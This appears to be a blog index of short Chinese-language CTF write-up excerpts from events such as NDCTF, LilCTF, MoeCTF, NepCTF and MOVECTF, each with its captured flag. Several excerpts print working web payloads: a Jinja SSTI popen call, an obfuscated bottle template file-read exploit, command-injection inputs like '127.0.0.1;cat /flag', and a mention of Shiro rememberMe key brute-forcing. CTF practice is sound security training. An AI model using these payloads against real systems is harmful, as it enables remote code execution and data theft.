?CTF-WP
...
NewStarCTF-WP
...
NDCTF-WP
WEBezpython源码找到路由/s3c0nd,进去发现需要fuzz,(直接盲猜114514结果对了),再进去是个ssti,直接打就行 GET:name={{lipsum.__globals__['os'].popen('cat /flag').read()}} ctfplus{6b0f159b-165b-4d18-86ae-5a49709ea088} MISC签到先base64解码,然后去查这个域名的txt记录 dig TXT...
LilCTF-WP
WEBez_bottleimport requestsimport zipfileimport reexploit_content = r"""% x= vars()['\x5f\x5fbuiltins\x5f\x5f']['\x6f\x70\x65\x6e']('/flag').read()% f= vars()['\x5f\x5fbuiltins\x5f\x5f']['\x6f\x70\x65\x6e']('./static/flag.txt','w')% f.write(x)% f.flush()"""with open("a.txt", "w", encoding="utf-8") as f: f.write(exploit_content)with...
MoeCTF-WP
0 Web入门指北直接放控制台回车就行 moectf{jv@vScr1p7_14_so0o0o0o_inT3r3&t!!!} 01 第一章 神秘的手镯只有前端验证,网络响应或者是直接控制台输入都行 document.getElementById('passwordInput').value =...
磐石行动-WP
WEBezDecryption源码中找到提示2025,就是第一步验证码答案 抓包修改step2为step3进入第三关 分析源码中js文件,在控制台中分析获得第一段为panshi 第二段base64解码后为2oZ5 发包获得flag flag{d1g1t4l_l0ck_br34k3r_2025} 1web-jaba_ezMISC1derderjiaeasy_miscBinwalk提取图片获得压缩包,里面是ook编码,解密获得y0u_c@t_m3!!!,就是压缩包密码,解压获得flagflag{3088eb0b-6e6b-11ed-9a10-145afc243ea2} 1两个数level1尝试直接二进制转ascii不行,那就尝试按位反转后补齐转ascii # 给定的二进制串列表binary_strings = [ "1100001", "000011", "0111011", "1110011", "0100111",...
NepCTF-WP
JavaSeri签到题,借这个题顺便解决了哈shiro框架工具不能正常使用的历史遗留问题,最后发现java版本1.8.0_321能够正常使用 这个题登录之后看到熟悉的rememberMe,直接工具一把梭,爆破密钥加爆破利用链及回显再执行命令就行了 flag{e22d3fa1-4a94-1155-e387-9b8744455d70} easyGooGooVVVY参考ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞 - twsec -...
0xGame-WP
...
L3HCTF-WP
best_profile先分析源码,发现在app.py中存在如下代码 @app.route("/get_last_ip/<string:username>", methods=["GET", "POST"])def route_check_ip(username): if not current_user.is_authenticated: return "You need to login first." user = User.query.filter_by(username=username).first() if not user: return "User not found." return render_template("last_ip.html", last_ip=user.last_ip)geoip2_reader =...
MOVECTF-WP
RCELABS-0 flag{3s2wvash-ps8i-42r-8idu-29lukzyaulna} RCELABS-1a=system("tac /flag"); flag{jrifs3wu-dsqq-4hr-8pmw-lojok3hevw9a} RCELABS-2GET:action=submitPOST:content=system("cat /flag") flag{qicmdfa6-qphh-4rz-8dze-uyq1k5icrha5} RCELABS-3a=cat /flag flag{x88vasgf-jsvy-4ga-8mlb-wbot5g7mh20c} RCELABS-4ip=127.0.0.1;cat /flag flag{sy2wwv2g-fk61-47z-8pic-m2uof4pfi7ko} RCELABS-5cmd=cat...
